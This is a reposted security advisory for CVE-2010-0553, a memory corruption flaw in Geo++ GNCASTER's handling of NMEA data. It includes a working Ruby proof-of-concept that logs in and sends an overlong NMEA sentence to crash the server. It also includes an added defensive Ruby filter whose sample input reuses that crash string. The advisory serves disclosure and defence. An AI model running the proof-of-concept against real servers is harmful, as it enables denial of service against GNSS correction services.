SecurityReason.com - Our Reason is Security

Topic : Geo++(R) GNCASTER: Insecure handling of NMEA-data

SecurityAlert : 7003
CVE : CVE-2010-0553
CWE : CWE-20
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : RedTeam
Published : 08.02.2010

Affected Software : geopp:geo++_gncaster:1.4.0.7 and previous versions
geopp:geo++_gncaster:1.4.0.0



Advisory Content :

Advisory: Geo++(R) GNCASTER: Insecure handling of NMEA-data

During a penetration test, RedTeam Pentesting discovered that the
GNCaster software does not handle NMEA-data correctly. An attacker that
has valid login credentials can use this to crash the server software or
potentially execute code on the server.

Details
=======

Product: Geo++(R) GNCASTER
Affected Versions: <= 1.4.0.7
Fixed Versions: 1.4.0.8
Vulnerability Type: Memory corruption
Security Risk: medium
Vendor URL: http://www.geopp.de
Vendor Status: notified
Advisory URL: http://www.redteam-pentesting.de/advisories/rt-sa-2010-002
Advisory Status: published
CVE: TBA
CVE URL: TBA

Introduction
============

"Geo++(R) GNCASTER is the Geo++ implementation of a NTRIP caster. NTRIP
is a protocol within RTCM to provide GNSS information via Internet."

(from the vendor's homepage)

More Details
============

After logging in, the GNCaster server software allows the user to
receive data streams. For some of these streams the user can send
so-called NMEA-data to the server to specify the user's geographical
position. If an attacker sends a long data string, the server software
crashes. RedTeam Pentesting believes it is also possible to exploit this
vulnerability to execute code on the server.

Proof of Concept
================

The following ruby script can be used to crash the GNCaster server:

-------------------------------------------------------------------
#!/usr/bin/env ruby
############################################
#                                          #
# RedTeam Pentesting GmbH                  #
# kontakt (at) redteam-pentesting (dot) de #
# http://www.redteam-pentesting.de         #
#                                          #
############################################

require 'socket'
require 'base64'

if ARGV.length < 3 then
  puts "USAGE: %s host:port user:password stream" % __FILE__
  puts "Example: %s 127.0.0.1:2101 testuser:secret /0001" % __FILE__
  puts
  exit
end

host, port = ARGV[0].split(':')
pw, stream = ARGV[1..2]

begin
  puts "requesting stream %s" % stream.inspect
  sock = TCPSocket.new(host, port.to_i)
  sock.write("GET %s HTTP/1.1\r\n" % stream)
  sock.write("Authorization: Basic %s\r\n" % Base64.encode64(pw).strip)
  sock.write("\r\n")

  response = sock.readline

  puts "server response: %s" % response.inspect

  puts "sending modified nmea data"
  sock.write("$GP" + "A" * 2000 +
             "GGA,134047.00,5005.40000000,N,00839.60000000," +
             "E,1,05,0.19,+00400,M,47.950,M,,*69\r\n")
  puts "done"
end
-------------------------------------------------------------------

Workaround
==========

A vulnerable server could be protected from this vulnerability by an
application layer firewall that filters overly long NMEA-data.
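The filter below is an added example, not part of the RedTeam advisory and not Geo++ code: a Ruby sketch of the check such an application-layer filter would perform on every client line before it reaches the caster, covering the failure mode described under "More Details" as well as this workaround. It rejects any line longer than the 82-character maximum that NMEA 0183 allows for a sentence (including "$" and CR LF) before parsing anything else, then checks framing, printable ASCII, the talker/type prefix and the XOR checksum, and it reads the client stream with a bounded read so that a line with no terminator can never grow the buffer. The allowed sentence types, the 4096-byte resynchronisation chunk and the sample client input (whose second line mirrors the oversized sentence from the proof of concept) are assumptions constructed for this example.

```ruby
# Added example (not RedTeam Pentesting's or Geo++'s code): an NMEA 0183 line
# filter of the kind the Workaround section describes, sitting between the
# client and the caster. Every limit is enforced before any field is parsed.
require 'stringio'

NMEA_MAX_LEN = 82                             # NMEA 0183: longest sentence incl. "$" and CR LF
NMEA_ALLOWED_TYPES = %w[GGA RMC GLL].freeze   # assumption: the fix types a caster needs
RESYNC_CHUNK = 4096                           # assumption: bounded read size when discarding

# XOR of every byte between "$" and "*", as two uppercase hex digits.
def nmea_checksum(body)
  body.each_byte.inject(0) { |acc, b| acc ^ b }.to_s(16).upcase.rjust(2, "0")
end

# Classify one line received from a client. Returns :ok if the line may be
# forwarded to the caster, otherwise a symbol naming the reason for rejection.
def check_nmea_sentence(line)
  return :too_long      if line.bytesize > NMEA_MAX_LEN   # the advisory's crash input
  return :bad_framing   unless line.end_with?("\r\n")
  s = line.chomp("\r\n")
  return :bad_framing   unless s.start_with?("$")
  return :non_printable if s.bytes.any? { |b| b < 0x20 || b > 0x7E }
  m = s.match(/\A\$([A-Z]{2})([A-Z]{3}),(.*)\*([0-9A-F]{2})\z/)
  return :malformed     unless m
  talker, type, fields, sum = m.captures
  return :unknown_type  unless NMEA_ALLOWED_TYPES.include?(type)
  return :bad_checksum  unless nmea_checksum("#{talker}#{type},#{fields}") == sum
  :ok
end

# Read client lines with a hard cap: IO#gets(sep, limit) returns at most
# `limit` bytes, so an endless line without CR LF can never grow the buffer.
# Returns [forwarded_lines, rejections]; each rejection is [reason, prefix].
def filter_nmea_stream(io)
  forwarded, rejected = [], []
  while (line = io.gets("\n", NMEA_MAX_LEN + 1))
    verdict = check_nmea_sentence(line)
    if verdict == :ok
      forwarded << line
    else
      rejected << [verdict, line[0, 16]]
      # A partial read leaves the rest of an over-long line in the stream;
      # drop it in bounded chunks until the next newline so we resynchronise.
      unless line.end_with?("\n")
        while (rest = io.gets("\n", RESYNC_CHUNK)) && !rest.end_with?("\n"); end
      end
    end
  end
  [forwarded, rejected]
end

# Constructed sample input: a valid GGA fix, an oversized sentence shaped like
# the one in the proof of concept, a fix with a wrong checksum, a valid fix.
GOOD_GGA = "$GPGGA,123519,4807.038,N,01131.000,E,1,08,0.9,545.4,M,46.9,M,,*47\r\n"
SAMPLE_CLIENT_INPUT =
  GOOD_GGA +
  "$GP" + "A" * 2000 + "GGA,134047.00,5005.40000000,N,00839.60000000,E,1,05,0.19,+00400,M,47.950,M,,*69\r\n" +
  GOOD_GGA.sub("*47", "*00") +
  GOOD_GGA

if __FILE__ == $0
  forwarded, rejected = filter_nmea_stream(StringIO.new(SAMPLE_CLIENT_INPUT))
  puts "forwarded #{forwarded.length} sentence(s)"
  rejected.each { |reason, prefix| puts "rejected #{reason}: #{prefix.inspect}..." }
end
```

The length check comes first on purpose: it is the one test that defeats the crash input shown in the proof of concept, and it costs nothing. The checksum and type checks behind it cut down the attack surface that reaches the caster's own parser, but they are only meaningful once the input is known to be short.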

Fix
===

Update GNCASTER to version 1.4.0.8.

Security Risk
=============

As an attacker needs valid user credentials for this attack, the risk of
this vulnerability is regarded as medium. If streams that use NMEA-data
are publicly available, the risk should be considered as high.

History
=======

2009-07-07 Vulnerability identified during a penetration test
2009-07-14 Meeting with customer
2009-12-01 Vendor releases fixed version
2010-01-27 Advisory released

RedTeam Pentesting GmbH
=======================

RedTeam Pentesting offers individual penetration tests (pentests for
short), performed by a team of specialised IT security experts. In this
way, security weaknesses in company networks or products are uncovered
and can be fixed immediately.

As there are only a few experts in this field, RedTeam Pentesting wants
to share its knowledge and enhance the public knowledge with research in
security related areas. The results are made available as public
security advisories.

More information about RedTeam Pentesting can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting GmbH                  Tel.: +49 241 963-1300
Dennewartstr. 25-27                      Fax : +49 241 963-1304
52068 Aachen                             http://www.redteam-pentesting.de/
Germany                                  Registergericht: Aachen HRB 14004
Geschäftsführer: Patrick Hof, Jens Liebchen, Claus R. F. Overbeck
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iQEVAwUBS2A0d9G/HXWsgFSuAQLv5wf/e6at3LCI4iXgxe4v/nJz3c/6b36EONWe
ZdpegZFmIrbH4ywRS3A0BzvOXk0qNixHWPDrqMpthjRRM8TDEHRv4QY8fZC53DZa
QvwtVOsrkMAU/VgUWzdrKLZ6dKEAZUpfANoIpaStASqKviC0QjukwAEipkQD1rPt
pZTJasgoDBZ+fKu1fT7NkOrxrOloXVhr2KRRdt6OzfuYpYBryPpAztywGy8kvIId
zwHf7AbhSPbHPX8gyXt1U/quC7InOhx8oE6Z7DsP3KJ8PgfQQ6q1rKAuXkB8X+/y
FFF1fCYbu+nEDD7qzf3r72yDLvBfjCvqKmKn/mvDi+UilXVHZCAHkw==
=5glG
-----END PGP SIGNATURE-----



References :

http://xforce.iss.net/xforce/xfdb/55975
http://www.securityfocus.com/archive/1/archive/1/509197/100/0/threaded
http://www.redteam-pentesting.de/en/advisories/rt-sa-2010-002/-geo-r-gncaster-insecure-handling-of-nmea-data
http://secunia.com/advisories/38323
http://osvdb.org/62012

Copyright © SecurityReason.com. All Rights Reserved.